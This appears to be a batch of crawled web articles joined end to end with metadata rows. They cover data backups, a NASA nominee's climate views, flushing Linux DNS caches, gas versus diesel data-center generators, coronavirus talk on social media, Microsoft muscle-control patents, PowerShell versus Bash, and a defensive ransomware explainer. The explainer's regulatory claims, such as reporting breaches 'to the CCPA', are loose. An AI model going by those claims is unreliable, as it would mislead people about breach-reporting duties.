Online cloud backup services
When you backup online, you’re backing up your data remotely via the internet. Your backed up data is stored in what is known as ‘the cloud’, and is accessible at any time over the internet. Most cloud backup services offer automatic and continuous backup, as well as automated encryption, meaning your backup is always up-to-date and highly secure. Bear in mind, however, that cloud-based backups can be vulnerable to malicious activity exposing your data to risk.
External hard drive backups
Hard drive backups are physical devices that store your data. Backing up to a hard drive is a manual process and can be limited by the capacity of the storage device you’ve got. Hard drive backups do not rely on an internet connection. Note however, that the physical security and location of your hard drive will be your biggest concern and risk factor.
NAS backup stands for ‘Network Attached Storage’ Backup. In actual fact, NAS is not intended as a backup mechanism, but many organizations still use it as such. NAS is a file storage system that is intended to foster collaboration between users.
USB or flash drive backup
You can go a little old-school and simply backup to a USB stick. Simply load the files that you want to backup onto the flash drive and you’re done! For obvious reasons, this method is more effective at an individual level.
Best backup practices
Don’t be fooled, it’s not enough to back up once and never think about it again. Here are a few best practices to follow for maximum peace of mind:
- Backup regularly at consistent intervals.
- Backup to more than one location for maximum security
- Encrypt your backups
- Consider endpoint devices that you might have overlooked in your backup
If you have a BYOD policy in place, then consider how these personal devices should fit into your backup infrastructure RMM Software, PSA and Remote Access that will change the way you run your MSP Business
See Atera in Action
RMM Software, PSA and Remote Access that will change the way you run your MSP Business | <urn:uuid:8836e635-7dc1-410d-814a-6fd9b18e7657> | CC-MAIN-2022-40 | https://www.atera.com/blog/world-backup-day-march-31st-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00515.warc.gz | en | 0.944614 | 728 | 2.6875 | 3 |
Trump’s NASA nominee is Jim Bridenstine, a congressman from Oklahoma.
NASA has a likely new head, and like other people the Donald Trump administration has put in top science-related jobs, he’s not a big fan of climate-change research.
Trump’s NASA nominee is Jim Bridenstine, a congressman from Oklahoma. In 2013, he told Congress that global temperatures “stopped rising 10 years ago” (not true) and that “global temperature changes, when they exist, correlate with sun output and ocean cycles” (there is a small correlation, but plenty of research shows greenhouse gases play a far larger role). Two years ago he needled “climate-change alarmists” on Twitter.
But assuming the Senate confirms his nomination (a formality), Bridenstine will lead a space agency that spends nearly a tenth of its budget on “earth science,” which includes research into both weather patterns and climate change. Trump originally said he wanted to scrap the earth science program entirely in favor of space exploration, but his proposed 2018 budget took a milder approach, cutting the program by a little under 10%, to $1.8 billion. NASA’s overall budget is $19.6 billion.
Bridenstine evidently knows the importance of weather research. “People often say, ‘Why are you so involved in space issues?'” he reportedly said at a commercial space transportation conference this year. “My constituents get killed in tornadoes. I care about space.” In his 2013 speech in Congress, he chided president Barack Obama for spending “30 times as much money on global warming research as he does on weather forecasting and warning.” (That’s false too.)
From this one may infer that Bridenstine believes it’s important to, say, track and study major storms, but less important to investigate why they’re becoming more severe, even though researchers have found over and over that global warming is making phenomena like hurricanes, floods, droughts, heatwaves, and wildfires more devastating than they would have been otherwise.
The trouble is that weather research and climate research are not so simple to disentangle. NASA’s 16 earth science satellites (plus three other instruments attached to the International Space Station) make up the core of the agency’s climate science program. They don’t just collect data on climate change; they also monitor, among other things, the oceans, soil health, wildfires, air quality, and hurricanes. That makes the program useful for emergency response during major, fast-developing storms.
Right now, Hurricane Irma, the second-strongest hurricane ever observed over the Atlantic Ocean, is barreling through the Caribbean en route to Florida—and a team from NASA and the National Oceanographic and Atmospheric Administration is watching its path with the most advanced weather satellite the agencies have ever built. The GOES-16 satellite, launched last year, can take far higher resolution images of the developing storm than any of its predecessors.
While Bridenstine’s climate-denying comments from 2013 are sure to come up in his Senate confirmation hearings, a former colleague told told Science magazine that Bridenstine does believe the planet is warming and that carbon dioxide is a greenhouse gas. As for his climate change-denial comments from 2013, he’d “probably say it differently today.” In an editorial, the editor of The Tulsa World said the same thing—that Bridenstine told him he would have phrased it differently now.
But he also told the editor he had opposed the US’s involvement in the Paris climate accord, from which Trump has said the US will withdraw, and that while he does believe carbon dioxide is warming the planet, he would probably disagree “about the severity of the problem” with people who accept the scientific consensus. The editor noted that he doesn’t believe Bridenstine has “moderated much” since his 2013 speech on the House floor.
Columbia University climate law professor Michael Gerrard was more forceful, calling Bridenstine a “climate denier” on Twitter.
It’s not yet clear, then, what Bridenstine would do to NASA’s earth sciences program. But any large, immediate cutbacks to the mission would be difficult if not impossible. Ceasing to fly the satellites simply isn’t an option, according to a contractor Quartz spoke with earlier this year, who works as an engineer for one NASA satellite that collects climate data.
“If you stopped operations—if nobody manned the satellites—they would crash and spread space debris,” which would threaten other satellites in orbit and is a danger nobody would risk, the engineer said. Bringing the satellites back to Earth is another option, but the “deorbiting process” takes “years and years,” the engineer says. Plus, most contractors are on a five-year contract, and the sprawling infrastructure and personnel involved in ongoing missions couldn’t just be terminated or shifted to another agency without enormous expense.
Still, while ceasing the earth science program altogether might not be practical, the engineer worried about NASA simply ceasing data collection from the satellites. That would punch a hole in the data used by climate scientists worldwide and jeopardize the scientific rigor of US research.
NEXT STORY: What We Don't Know About What Facebook Knows | <urn:uuid:e6f26c10-748f-46e6-9699-7e16907f6bad> | CC-MAIN-2022-40 | https://www.nextgov.com/analytics-data/2017/09/nasas-next-head-wants-it-do-less-climate-science-and-more-weather-science-you-cant-separate-them/140816/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00515.warc.gz | en | 0.95221 | 1,147 | 2.546875 | 3 |
DNS, short for the Domain Name System protocol, is used on Linux systems in order to retrieve IP addresses associated with names.
For example, when you are performing a ping request, it is quite likely that you are using the DNS protocol to retrieve the server IP.
In most cases, the DNS requests that you perform are stored in a local cache on your operating system.
However, in some cases, you may want to flush the DNS cache of your server.
It might be because you changed the IP of a server on your network and you want to changes to be reflected immediately.
In this tutorial, you are going to learn how you can easily flush the DNS cache on Linux, whether you are using systemd or dnsmasq.
In order to be able to flush your DNS cache, you have to know how DNS resolution works on your Linux system.
Depending on your distribution, you may be facing different Linux services that act as a DNS resolver.
Before you start, it is quite important for you to know how DNS resolution will actually happen on your operating system.
If you are reading this article, you are looking to flush the cache of your local DNS resolver. But as you can see, there are many different caches from your local application until the actual Internet DNS servers.
In this tutorial, we are going to focus on the yellow box meaning the local stub resolver implemented on every Linux system.
Finding your local DNS resolver
$ sudo lsof -i :53 -S
Note : so why are we running this command? As DNS runs on port 53, we are looking for the commands associated with the service running on port 53, which is your local DNS resolver or “stub”.
As you can see, on a recent Ubuntu 20.04 distribution, the service listening on port 53 is systemd-resolved. However, if you were to execute this command on Ubuntu 14.04, you would get a different output.
In this case, the local DNS used in dnsmasq and commands are obviously different.
Knowing this information, you can go the chapter you are interested in. If you were to have a different output on your server, make sure to leave a comment for us to update this article.
Flush DNS using systemd-resolved
The easiest way to flush the DNS on Linux, if you are using systemd-resolved, is to use the “systemd-resolve” command followed by “–flush-caches”.
Alternatively, you can use the “resolvectl” command followed by the “flush-caches” option.
$ sudo systemd-resolve --flush-caches $ sudo resolvectl flush-caches
In order to verify that your Linux DNS cache was actually flushed, you can use the “–statistics” option that will highlight the “Current Cache Size” under the “Cache” section.
$ sudo systemd-resolve --statistics
Congratulations, you successfully flushed your DNS cache on Linux!
Flush DNS cache using signals
Another way of flushing the DNS cache can be achieved by sending a “USR2” signal to the “systemd-resolved” service that will instruct it to flush its DNS cache.
$ sudo killall -USR2 systemd-resolved
In order to check that the DNS cache was actually flushed, you can send a “USR1” signal to the systemd-resolved service. This way, it will dump its current state into the systemd journal.
$ sudo killall -USR1 systemd-resolved $ sudo journalctl -r -u systemd-resolved
Awesome, your DNS cache was correctly flushed using signals!
Flush DNS using dnsmasq
The easiest way to flush your DNS resolver, when using dnsmasq, is send a “SIGHUP” signal to the “dnsmasq” process with the “killall” command.
$ sudo killall -HUP dnsmasq
Similarly to systemd-resolved, you can send a “USR1” to the process in order for it to print its statistics to the “syslog” log file. Using a simple “tail” command, we are able to verify that the DNS cache was actually flushed.
Now what if you were to run dnsmasq as a service?
Dnsmasq running a service
In some cases, you may run “dnsmasq” as a service on your server. In order to check whether this is the case or not, you can run the “systemctl” command or the “service” one if you are on an SysVinit system.
$ sudo systemctl is-active dnsmasq # On SysVinit systems $ sudo service dnsmasq status
If you notice that dnsmasq is running as a service, you can restart it using the usual “systemctl” or “service” commands.
$ sudo systemctl restart dnsmasq # On SysVinit systems $ sudo service dnsmasq restart
After running those commands, always make sure that your services were correctly restarted.
$ sudo systemctl status dnsmasq # On SysVinit systems $ sudo service dnsmasq status
In this tutorial, you learnt how you can quickly and easily flush your DNS cache on Linux.
Using this article, you can easily clear the cache for systemd and dnsmasq local resolvers. However, you should know that there is another common DNS, named bind, that is purposefully omitted in this article.
Another article about setting up a local DNS cache server using BIND should come in the near future.
If you are interested in DNS queries and how they are performed, you can use this very useful article from “zwischenzugs” named the “Anatomy of a DNS query“. The article is particularly useful if you want to debug DNS queries and you wonder how they are performed.
Also if you are interested in Linux System Administration, we have a complete section about it on the website, so make sure to check it out. | <urn:uuid:0d75b0d0-351d-4734-ae0d-8425cf9e6bc2> | CC-MAIN-2022-40 | http://dztechno.com/how-to-flush-dns-cache-on-linux-devconnected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00515.warc.gz | en | 0.9199 | 1,331 | 3.109375 | 3 |
Yiğit Bulut, Partner, and CTO at EYP Mission Critical Facilities, also contributed to this article.
Globally, most data centers are designed and constructed with the primary goal of achieving highly reliable facilities that are engineered to remain online and operational in the face of any foreseeable or unforeseeable eventualities.
Data centers, by nature of the information technology (IT) equipment they support and the processes which run on them, are considered mission critical and must remain operational as continuously as possible.
The need for an emergency power supply system (EPSS) to run for 120 minutes (generally requiring onsite fuel storage), or longer for most data center operators, has resulted in the selection of diesel engine generators as the primary and most common choice of back-up energy for critical systems.
The typical topology consists of different combinations and levels of redundancy of UPS backed up by diesel generators with 12 to 72 hours or more of onsite fuel storage
But in terms of its future as a standby source of power for data centers, the road map for diesel looks like one of increasing restrictions on use, tougher tax regimes, permitting, lower emissions targets, improved air quality requirements and lower noise regulations.
This raises an intriguing question: Will data center primary or emergency power move to natural gas engines?
The case for gas
One of the main advantages of gas burning over diesel burning is lower emissions – less NOx and CO2.
Natural gas (NG) engines have better emission profiles compared to same size diesel engine generators. Depending on the type of ignition system utilized, NG generators in the higher power ratings range are typically either lean burning; the air to fuel ratio is higher than the stoichiometric air-to-fuel ratio (16:1) which results in a lower combustion temperature that minimizes NOx emissions - or rich burn, where the air-to-fuel ratio is lower.
The trade-off in the type of combustion selection nominally boils down to two competing considerations; The lean burn engine, while having a better emission profile and efficiency, does not have the block loading or load assumption capability of the rich burning engine. This explains why historically, rich burn engines have been preferred to lean burn engines for standby operation.
In comparison to US EPA Tier 2 diesel generators, both lean burn and rich burn NG generators produce less NOx and CO2 per kW - but at a higher initial cost.
For some, that alone might be seen as making a strong enough case for transitioning.
The case against gas
What are the challenges for using gas?
- On site fuel storage
- Poor utility connections
- High initial capex – but TCO is narrowing
- Design considerations
Onsite fuel storage has historically been one of the major stumbling blocks for the use of NG generators in emergency operations as it requires onsite fuel storage in an amount which is challenging with most codes. For a data center to be Tier certified a minimum of 12 hours standby operation of onsite storage of fuel is needed. Even if the facility data center is not to be Tier certified, most data center operators will not be comfortable with no onsite fuel storage.
In the past, the argument has been made that the natural gas distribution system is inherently reliable, principally because it is almost entirely underground and because it is a mesh-based system. However, this is not always so, as evidenced with the failure of the natural gas supply during the Texas power outage of the winter of 2021.
As stated above, when compared to EPA tier 2 diesel generators, NG units present a higher initial capex. Consider, however, that current US emission requirements for Tier 4 final certified engines adds significant cost to diesel generators. These will deliver lower emission levels which are closer to their NG counterparts. On the basis of emissions, this narrows the advantage of NG generators, but because of the added cost of diesel infrastructure it also makes NG generators more cost competitive.
Design considerations for natural gas engines
Given the advances in NG generator designs and capabilities as well as their favorable emissions profiles with respect to diesel generators, if the decision is made to incorporate them into the power plant for the data center there are design considerations that need be judged. NG generators cannot simply be substituted for their diesel counterparts in most designs.
The load acceptance profile of NG generators requires a careful evaluation of the design topology and the interaction of the various loads with the generators. Given that over the last few years most data center UPS battery plants have been optimized for shorter and shorter run-times, some as low as 1 to 3 minutes, it is necessary to evaluate this based on the decision to incorporate lean or rich burn engines. UPS walk-in times, as well as an evaluation of the mechanical load start up profile, should be evaluated to align with the load acceptance profile of the NG generator selected.
For a deeper perspective on standby power generation which provides a technical analysis of gas reciprocating engines read the i3 Solutions/EYP White Paper: “The Case for Natural Gas Generators," which compares emissions profiles and performance characteristics of diesel and gas generators, and outlines the case for, and the challenges to, adopting gas reciprocating engines for use in data centers. | <urn:uuid:d2d2f142-fe5e-486f-90f7-eded27564e2a> | CC-MAIN-2022-40 | https://direct.datacenterdynamics.com/en/opinions/will-natural-gas-replace-diesel-as-a-data-center-power-source/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00515.warc.gz | en | 0.939393 | 1,062 | 2.59375 | 3 |
It’s impossible to escape discussion about the coronavirus. Wherever you go online, discussions are dominated by the spread of COVID-19, the disease caused by the coronavirus, with social media users swapping tips, tricks and information – as well as varying levels of accurate advice – about its spread.
But a new paper by Italian researchers shows that what may at first seem like a unified, global conversation is actually very disparate, with different platforms focusing on different parts of the coronavirus issue.
A team of nine academics have analysed the way information about COVID-19 is spread and shared on Twitter, Instagram, YouTube, Reddit, and Gab. The team looked at more than eight million comments posted over 45 days since the existence of coronavirus first caught the attention of the world. They also analysed user engagement and interest around the coronavirus.
How they did it
The team monitored key terms around the coronavirus, based on Google Trends’ related queries, covering phrases and words like “pandemic” and “Wuhan”. They found nearly 3.4 million users had posted comments about coronavirus-related issues across the different social platforms.
What the researchers found was interesting: on Reddit and YouTube, discussions revolved primarily around the death toll and rising number of infection rates. On Twitter, the main topic of discussion was the suspension of suspended flights and repatriation, as well as the economic impact and advice on how to protect yourself against the spread of the virus.
Instagram was different: the main discussion points on the photo-sharing platform, accounting for nearly half of all interactions the researchers measured there, was focused on the “Chinese crisis”.
On Gab, the social media platform established after Twitter was accused of censoring extreme viewpoints, more than half of the discussions measured by the researchers revolved around the unfolding crisis on the Diamond Princess, the cruise ship that was a crucible for infection, and the notion that the spread of the virus was the result of biological warfare.
Reddit has in-depth conversations
The number of different topics discussed also shines some light on the makeup of each platform’s users. Redditors managed to cover 19 different areas, including the censorship of the Chinese internet by tech giant Tencent to try and stifle news about the coronavirus escaping from China. Perhaps expectedly, Instagram had the least in-depth analysis of the subject, focusing mainly on advice on how to protect yourself, the mounting death toll, and comparison with other viruses.
“Gab is the environment more susceptible to misinformation diffusion,” the researchers write, but “information marked either as reliable or questionable do not present significant differences in their spreading patterns.”
Social media struggles with real news
The findings support previous research that demonstrates that on social media, fake news travels faster, further and deeper than real news. That research, conducted by the Massachusetts Institute of Technology (MIT), tracked stories and how they spread on Twitter.
But not all social networks are created equal. While Reddit’s unreliable posts accounted for just 5% of the reliable posts about coronavirus shared on the platform, 7% on YouTube, and 11% on Twitter, it was much higher on Gab – 70%, according to the research.
And those posts were reacted with much more than ones containing reliable information on Gab. The volume of engagements with questionable content is 270% greater than the engagement with reliable content.
“Our analysis suggests that information spreading is driven by the interaction paradigm imposed by the specific social media or/and by the specific interaction patterns of groups of users engaged with the topic,” the authors say. | <urn:uuid:a7ecd123-b7e7-4b6e-aa5c-aebea52ac8ef> | CC-MAIN-2022-40 | https://cybernews.com/editorial/how-you-are-reacting-to-coronavirus-depends-on-the-social-media-platform-you-use/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00715.warc.gz | en | 0.957276 | 758 | 2.53125 | 3 |
Over the past 18 years, Microsoft’s Research Division (MSR), a large group of
computer researchers in key locations worldwide, has come up with some
interesting and useful technologies, as well as a few that may seem on the
wackier side of things.
For instance, MSR was largely responsible for creating Microsoft’s (NASDAQ:
tabletop computer, which is now beginning to realize the technology’s
practical applications in commercial deployments.
Now, among the most recent developments out of MSR are technologies that
enable a user to control a computer’s interface by merely flexing his or her
muscles. Two recently published Microsoft patent applications seem to be
pointing the way toward what could become practical developments in that area.
The patent applications were published by the U.S. Patent and Trademark
Office (USPTO) on December 31 — the applications were filed in March 2009 and
in June 2008.
According to a video
posted on MSR’s site, muscle-computer interaction could be used to let a user
interact with a computerized device while his or her hands were full through a
technology called “electromyography,” or EMG.
As an example of how it might be used, the video shows a person with both
hands full able to electronically open the trunk of a car without setting
anything down through flexing hand muscles.
One of the two patent applications describes the
technology as a “wearable electromyography-based controller [which] provides a
physical device, worn by or otherwise attached to a user, that directly senses
and decodes electrical signals produced by human muscular activity using surface
electromyography (sEMG) sensors. The resulting electrical signals provide a
muscle-computer interface for use in controlling or interacting with one or more
computing devices or other devices coupled to a computing device.”
The other patent application concerns a system to
train the software to recognize certain finger movements as commands as well as
a training system to enable the software to “learn” which gestures (groups of
muscle flexes) are meaningful.
Since its founding in 1991, MSR has played an often-overlooked role in many
small, and a few larger, technological innovations.
MSR played a role in developing Microsoft’s forthcoming camera-driven games
controller, dubbed Natal, which enables users to control games with
just the movements of their own bodies. Natal is currently slated to launch
commercially in November.
Recently, MSR computer scientists also participated in the development of
automated technologies meant to help identify child pornography online. That
technology, called PhotoDNA,
will be available to Internet service providers through the National Center for
Missing & Exploited Children.
At the same time, some other technologies may seem to be little less
practical — at least for now — such as one researcher’s efforts to record every minute of his life for later
Another recent patent application aims to make users’ online avatars reflect their human physical conditions
online — so if the user is overweight, the user’s avatar could mirror that.
Microsoft rarely comments on patent applications and whether it has plans to
commercialize particular inventions. A company spokesperson declined to comment
for this article.
Article courtesy of InternetNews.com. | <urn:uuid:7e426763-d1df-4171-a6c5-7ae48d00f44a> | CC-MAIN-2022-40 | https://www.datamation.com/applications/microsoft-seeks-patents-on-muscle-control-of-pcs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00715.warc.gz | en | 0.945098 | 725 | 2.765625 | 3 |
PowerShell vs Bash: What’s the Difference?
If you've followed IT trends for any length of time, you've no doubt have come across a few Windows vs. Linux articles. However, pitting these two OSes against one another is not always logical or fair. In most cases it really is an apples and oranges comparison, based on the tasks that are being measured.
Windows and Linux are both very capable operating systems, and each has its own myriad pros and cons that we can debate. But how often do you stop to think about the scripting and automation potential of the two OSes? We decided to look at some of the things that you can do with the scripting functions that ship with Windows and Linux.
A Little History: PowerShell
Windows was never the greatest at automation tasks. This was partially due to the way that it implemented its command line. It was very much a throwback to the familiar DOS prompt that launched Microsoft to being the massive success it is today. But it lacked features when compared to Unix and later Linux systems.
PowerShell is Microsoft's automation and task framework — it is good for configuration management. PowerShell relies on components called cmdlets that are built into PowerShell. Additional functionality is available via modules. These are installed from the PowerShell Gallery directly from the command line.
PowerShell is different from Bash because it is designed to interact with .NET structures natively in Windows. This means that it can pipe objects and data between scripts, applications and sessions. Each object has its own series of properties, which makes the data handling within PowerShell even more granular. Data can be specified as numbers (integers), words (strings), Boolean (true and false), and many other types. This means that you can get really specific with the way your scripts deal with data input and output.
A Little History: Bash
Linux and Unix systems have always benefited from being structured through a multi-user terminal environment. This means that you can launch additional sessions on the same system, and run scripts and applications without affecting the main sessions that other users are logged in as. This was very different from early Windows and DOS systems that were single user, single session environments until Windows NT came around in the mid 90s.
The original shell that shipped with Unix was known as the Bourne shell, named after its creator Stephen Bourne. Bash (Bourne again Shell) is the open source successor to the Bourne shell. Bash was widely adopted when Linux was created in the early 90s, which is why it is still in use today.
Features that make Bash very popular are many, chief among which are system stability and the fact that it is open source. It is found in just about every distribution of Linux because of this. All of these factors make it one of the most used scripting environments for IT professionals today.
When to Use PowerShell
Windows administration has gotten a whole lot easier since PowerShell development became a feature in the Microsoft landscapes. Instead of wrestling with ungainly batch files and the Windows Scheduler, sysadmins have access to a new toolbox of impressive apps and functions.
PowerShell can drill down into fine details to create powerful scripts that work, as well as some commercially available applications. PowerShell can pull data straight from the WMI subsystem, giving you real-time, deep-level information about anything from process IDs and Handle counts.
PowerShell is plugged into the .NET framework, so you can create great looking menus and winforms that look like legitimate applications. You can use PowerShell to do anything from querying SQL Databases to grabbing your favorite RSS Feeds right into your PowerShell session for further manipulation. It is a real Swiss army knife for system administration within Windows environments.
When to use Bash
If you are running Linux systems, then you know about the need for automating tasks. Early tape drives were used for backups with tar archiving. These operations could be scripted in Bash and then run via a cron schedule. We take this kind of thing for granted today, but many tasks had to be completed manually before environments like Bash were created. Anything to do with file manipulation such as archiving, copying, moving, renaming and deleting files are all right up Bash's alley.
More advanced file manipulation is also possible. You can find files created on certain dates, and which files have CHMOD and owner permissions changed. Bash is also great for creating interactive menus for running scripts and performing system functions. These are crude in the sense that they are run in a non-graphical environment, but they work very well. This is great for sharing your libraries of scripts with others. Running a script from a Bash menu is simply a matter of entering a number and hitting the Enter key.
What Have We Learned?
PowerShell and Bash are similar in some ways, but also very different. Here are four key ways they're different.
PowerShell Handles Data Differently
PowerShell is different from Bash in the way it handles data. PowerShell is a scripting language, but it is able to feed data in different formats in a way that makes it feel like a programming language. PowerShell also deals with scopes in its scripts.
Using variables with $session, $script and $cache gives your scripts additional flexibility by allowing the variables to be handed off to other commands in the same script or PowerShell session. When you really get into PowerShell it becomes a tool that you cannot live without.
Bash is a CLI
Bash is a CLI, which stands for Command Language Interpreter. Like PowerShell, Bash is able to pass data between commands via pipes. This data is sent as strings though. This limits some of the things that you can do with the output from your scripts such as mathematical functions.
PowerShell is Both CLI and Language
The default PowerShell Integrated Scripting Environment (ISE) that ships with Windows shows how you can quickly and easily create scripts without sacrificing direct access to a command line. By default, the top section lets you type out your lines of scripting code and quickly test it.
The window below is a PowerShell command line that gives you quick access to run single commands. This gives you the best of both worlds between a scripting language and a command-line shell. The ISE is a great tool to quickly prototype solutions.
PowerShell and Bash are Both Powerful Tools
The environment that you work in will define which tool you choose. Linux systems administrators who script in Bash find it relatively easy to pick up PowerShell scripting. PowerShell scripting skills also translate over to Bash scripting to a certain degree.
The main differences between these two scripting languages are syntax and data handling. If you understand concepts such as variables and functions, then learning either one of these languages starts to make a lot of sense.
Once you start scripting tasks you might be surprised to find yourself addicted to creating tools and automating processes. The key to scripting is understanding the way that your data is handled and how it flows between commands. Once you learn how to harness the power pipelines and how they work is the first step towards understanding automation, which can lead to DevOps and SecDevOps.
How you get there depends on what you script in. PowerShell and Bash are only the beginning, and they are both excellent places to get started. | <urn:uuid:4db08e00-76d6-473a-bbfb-cae2eb25a76e> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/certifications/microsoft/powershell-vs-bash-whats-the-difference | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00715.warc.gz | en | 0.956386 | 1,488 | 2.859375 | 3 |
Ransomware is a type of malware that encrypts a victim’s data until a payment is made to the attacker. If the payment is made, the victim receives a decryption key to restore access to their files. If the ransom payment is not made, the threat actor publishes the data on data leak sites (DLS) or blocks access to the files in perpetuity.
How a Ransomware Attack Works
- Step 1. Infection: Ransomware operators often using phishing emails and social engineering techniques to infect their victim’s computer. In most cases, the victim ends up clicking a malicious link in the email, introducing the ransomware variant on their device.
- Step 2. Encryption: After a device or system has been infected, ransomware then searches for and encrypts valuable files. Depending on the variant, the malicious software may find opportunities to spread to other devices and systems across the organization.
- Step 3. Ransom Demand: Once the data has been encrypted, a decryption key is required to unlock the files. In order to get the decryption key, the victim must follow the instructions left on a ransom note that outline how to pay the attacker – usually in Bitcoin.
Types of Ransomware
Encrypting Ransomware: In this instance the ransomware systematically encrypts files on the system’s hard drive, which becomes difficult to decrypt without paying the ransom for the decryption key. Payment is asked for using BitCoin, MoneyPak, PaySafeCard, Ukash or a prepaid (debit) card.
Screen Lockers: Lockers completely lock you out of your computer or system, so your files and applications are inaccessible. A lock screen displays the ransom demand, possibly with a countdown clock to increase urgency and drive victims to act.
Scareware: Scareware is a tactic that uses popups to convince victims they have a virus and directs them to download fake software to fix the issue
Example Ransomware Variants
|CryptoLocker||CryptoLocker ransomware was revolutionary in both the number of systems it impacted and its use of strong cryptographic algorithms. The group primarily leveraged their botnet for banking-related fraud.|
|NotPetya||NotPetya combines ransomware with the ability to propagate itself across a network. It spreads to Microsoft Windows machines using several propagation methods, including the EternalBlue exploit for the CVE-2017-0144 vulnerability in the SMB service.|
|Ryuk||WIZARD SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return.|
|REvil (Sodinokibi)||Sodinokibi/REvil ransomware is commonly associated with the threat actor PINCHY SPIDER and its affiliates operating under a ransomware-as-a-service (RaaS) model.|
|WannaCry||WannaCry has targeted healthcare organizations and utility companies using a Microsoft Windows exploit called EternalBlue, which allowed for the sharing of files, thus opening a door for the ransomware to spread.|
|Conti||Conti’s utilization of compiler-based obfuscation techniques, such as ADVobfuscator, provide code obfuscation when the ransomware’s source code is built. Portions of Conti’s source code are restructured or rewritten regularly with the intention of avoiding detection and disrupting automated malware analysis systems.|
2022 CrowdStrike Global Threat Report
Download the 2022 Global Threat Report to find out how security teams can better protect the people, processes, and technologies of a modern enterprise in an increasingly ominous threat landscape.Download Now
Should You Pay the Ransom?
The FBI does not support paying a ransom in response to a ransomware attack. They argue paying a ransom not only encourages the business model, but it also may go into the pockets of terror organizations, money launderers, and rogue nation-states. Moreover, while few organizations publicly admit to paying ransoms, adversaries will publicize that info on the dark web – making it common knowledge for other adversaries looking for a new target.
Paying the ransom doesn’t result in a faster recovery or a guaranteed recovery. There may be multiple decryption keys, there may be a bad decryption utility, the decryptor may be incompatible with the victim’s operating system, there may be double decryption and the decryption key only works on one layer, and some data may be corrupted. Less than half of ransomware victims are able to successfully restore their systems.
Ransomware Prevention and Defense Tips
Once ransomware encryption has taken place, it’s often too late to recover that data. That’s why the best ransomware defense relies on proactive prevention.
Ransomware is constantly evolving, making protection a challenge for many organizations. Follow these best practices to help keep your operations secure:
1. Train all employees on cybersecurity best practices:
Your employees are on the front line of your security. Make sure they follow good hygiene practices — such as using strong password protection, connecting only to secure Wi-Fi and never clicking on links from unsolicited emails.
2. Keep your operating system and other software patched and up to date:
Cybercriminals are constantly looking for holes and backdoors to exploit. By vigilantly updating your systems, you’ll minimize your exposure to known vulnerabilities.
3.Implement and Enhance Email Security
CrowdStrike recommends implementing an email security solution that conducts URL filtering and also attachment sandboxing. To streamline these efforts, an automated response capability can be used to allow for retroactive quarantining of delivered emails before the user interacts with them.
4. Continuously monitor your environment for malicious activity and IOAs:
Endpoint detection and response (EDR) acts like a surveillance camera across all endpoints, capturing raw events for automatic detection of malicious activity not identified by prevention methods and providing visibility for proactive threat hunting.
5. Integrate threat intelligence into your security strategy:
Monitor your systems in real time and keep up with the latest threat intelligence to detect an attack quickly, understand how best to respond, and prevent it from spreading.
6. Develop Ransomware-Proof Offline Backups
When developing a ransomware-proof backup infrastructure, the most important idea to consider is that threat actors have targeted online backups before deploying ransomware to the environment.
For these reasons, the only sure way of salvaging data during a ransomware attack is through ransomware-proof backups. For example, maintaining offline backups of your data allows for a quicker recovery in emergencies.
7. Implement a Robust Identity Protection Program
Organizations can improve their security posture by implementing a robust identity protection program to understand on-premises and cloud identity store hygiene (for example, Active Directory, Azure AD). Ascertain gaps, and analyze behavior and deviations for every workforce account (human users, privileged accounts, service accounts), detect lateral movement, and implement risk-based conditional access to detect and stop ransomware threats.
How to Respond to a Ransomware Attack
Once ransomware penetrates a device on your network, it can wreak havoc – causing disruption that grinds business operations to a halt. With company and client data, financial wellbeing and brand reputation at stake, knowing what to do if you get ransomware is critical.
If you do encounter ransomware, it’s important to:
1. Find the infected device(s): if ransomware penetrates your network, it’s important to identify and isolate any infected devices immediately – before the breach spreads to the rest of the network.
Firstly, look for any suspicious activity on the network, such as file renaming or file extensions changing. It’s likely that the system was breached by human error – for example, an employee clicking a suspicious link on a phishing email – so, employees can be a useful source of information. Ask if anyone has received or spotted any suspicious activity that may help pinpoint infected devices.
2. Stop ransomware in its tracks: the difference between a business-sinking infection and a minor network interruption can come down to reaction time. Businesses must swiftly cut or restrict network access to stop the spread from infected devices.
If possible, every device connected to the network – both on and off-site – should be disconnected. If necessary, disable any wireless connectivity, too – including Wi-Fi and Bluetooth – as this helps stop a ransomware infection from traversing the network, seizing, and encrypting crucial data.
3. Review the extent of the problem: it’s important to understand the extent of the damage caused by the breach to prepare an appropriate response.
Examine all devices connected to the network. Initial symptoms of ransomware encryption include file name changes and employees struggling to access files. Any devices displaying these signs should be noted – and immediately disconnected from the network – and may lead you to the gateway device where the infection first gained access to the network.
Build a list of infected devices and data centers. The business’ remediation process should include decryption of every compromised device, to stop the encryption process from restarting when you return to work.
4. Look to your backups: in a day and age where cybersecurity risks lurk around every corner, having backups of all your digital data – separated from the centralized network – is crucial to getting things up and running again quickly, and minimizing downtime, in the event of a breach.
Once all devices have been decrypted and fitted with antivirus software, it’s time to turn to your backup data to restore any compromised files.
However, before you do, run a quick check on any backup files. The increasing sophistication and resilience of modern ransomware means these files may also have been corrupted and rolling this data out to the network could simply put you back to step one.
5. Report the attack: while the immediate priority post-breach is to stop the spread and start the recovery phase, consideration must also be given to the wider consequences of the attack. Compromised data not only impacts the business but also its employees and clients.
As ransomware typically involves the threat of data leaks, any attack should be reported to the relevant authorities as soon as possible.
American data legislation doesn’t really exist on the federal level. However, a mix of individual states and some federal regulations issue strict fines to those data compliance regulations. If you suffer a data breach in California for example, you must report it to the CCPA, and any individual violation results in $7,500 fines per violation.
Ransomware and other forms of malware should also be reported to law enforcement authorities, who can help identify those responsible and prevent future attacks.
